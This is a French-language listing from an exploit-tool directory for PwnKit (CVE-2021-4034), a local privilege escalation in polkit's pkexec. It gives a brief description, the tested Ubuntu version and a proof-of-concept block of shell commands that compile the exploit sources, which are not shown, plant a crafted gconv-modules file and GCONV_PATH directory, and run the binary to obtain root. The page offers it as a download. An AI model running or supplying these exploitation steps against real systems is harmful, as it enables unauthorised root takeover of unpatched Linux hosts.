Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/tw-d/pwnkit-vulnerability_cve-2021-4034
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubtw-d/pwnkit-vulnerability_cve-2021-4034

PwnKit-Vulnerability_CVE-2021-4034

PwnKit - Vulnérabilité d'élévation de privilèges locaux découverte dans pkexec de polkit (CVE-2021-4034)

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 4 ansPas encore vérifié

Vulnérabilité PwnKit - Élévation de privilèges locale

  • Titre : Vulnérabilité PwnKit - Élévation de privilèges locale
  • Cible : Linux
  • Catégorie : Exécution
  • Crédits : Qualys Research Team

Description

L'équipe de recherche Qualys a découvert une vulnérabilité de corruption mémoire dans pkexec de polkit, un programme SUID-root installé par défaut sur toutes les principales distributions Linux. Cette vulnérabilité facilement exploitable permet à tout utilisateur non privilégié d'obtenir les privilèges root complets sur un hôte vulnérable en exploitant cette vulnérabilité dans sa configuration par défaut.

PwnKit : Vulnérabilité d'élévation de privilèges locale découverte dans pkexec de polkit (CVE-2021-4034)

Testé sur

Ubuntu 20.04.3 LTS x86_64

Version de pkexec 0.105

PoC

root@kitploit:~
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit
Télécharger l’outil